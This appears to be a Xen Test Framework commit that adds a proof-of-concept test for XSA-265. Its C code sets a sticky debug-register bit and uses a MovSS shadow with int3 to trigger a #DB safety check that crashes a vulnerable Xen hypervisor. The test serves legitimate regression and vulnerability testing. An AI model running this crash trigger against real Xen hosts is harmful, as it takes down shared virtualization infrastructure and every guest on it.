From: Andrew Cooper <andrew.cooper3@citrix.com>
Date: Mon, 25 Jun 2018 15:53:10 +0000 (+0100)
Subject: XSA-265 PoC
X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=f3702a5d29e94814991988bf8747341e18a2e8f5;p=xtf.git

XSA-265 PoC

Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
---

diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index f8a495a..177e398 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -120,6 +120,9 @@ guest breakout.
 
 @subpage test-xsa-261 - vHPET interrupt injection memory corruption.
 
+@subpage test-xsa-265 - x86: @#DB exception safety check can be triggered by a
+guest.
+
 
 @section index-utility Utilities
 
diff --git a/tests/xsa-265/Makefile b/tests/xsa-265/Makefile
new file mode 100644
index 0000000..fa6aaf6
--- /dev/null
+++ b/tests/xsa-265/Makefile
@@ -0,0 +1,9 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-265
+CATEGORY  := xsa
+TEST-ENVS := pv64
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-265/main.c b/tests/xsa-265/main.c
new file mode 100644
index 0000000..760ba49
--- /dev/null
+++ b/tests/xsa-265/main.c
@@ -0,0 +1,61 @@
+/**
+ * @file tests/xsa-265/main.c
+ * @ref test-xsa-265
+ *
+ * @page test-xsa-265 XSA-265
+ *
+ * Advisory: [XSA-265](http://xenbits.xen.org/xsa/advisory-264.html)
+ *
+ * One of the fixes for
+ * [XSA-260](http://xenbits.xen.org/gitweb/?p=xen.git;a=commitdiff;h=75d6828bc2146d0eea16adc92376951a310d94a7)
+ * introduced logic to try and prevent livelocks of @#DB exceptions in
+ * hypervisor context.  However, it failed to account for the fact that some
+ * %dr6 bits are sticky and never cleared by hardware.
+ *
+ * This test sets the sticky `%%dr6.DB` bit, then uses a `MovSS` shadow to
+ * deliver a @#DB exception in hypervisor context.  A vulnerable Xen will
+ * trigger the safety check and crash.
+ *
+ * @see tests/xsa-265/main.c
+ */
+#include <xtf.h>
+
+const char test_title[] = "XSA-265 PoC";
+
+void test_main(void)
+{
+    unsigned int ss = read_ss();
+    unsigned long dr7 = DR7_SYM(0, L, G, RW, 32) | X86_DR7_LE | X86_DR7_GE;
+
+    /* Latch the sticky General Detect flag in %dr6 */
+    write_dr6(X86_DR6_BD);
+
+    /* Data breakpoint for `ss`, working around Xen's %dr7 latching bug. */
+    write_dr0(_u(&ss));
+    write_dr7(dr7);
+    write_dr7(dr7);
+
+    asm volatile ("mov %[ss], %%ss; int3; 1:"
+                  _ASM_TRAP_OK(1b)
+                  :: [ss] "m" (ss), "X" (ex_record_fault_eax));
+
+    /*
+     * If Xen is still alive at this point, the erroneous safety check didn't
+     * trip.
+     */
+
+    write_dr7(0);
+    write_dr7(0);
+
+    xtf_success("Success: Not vulnerable to XSA-265\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */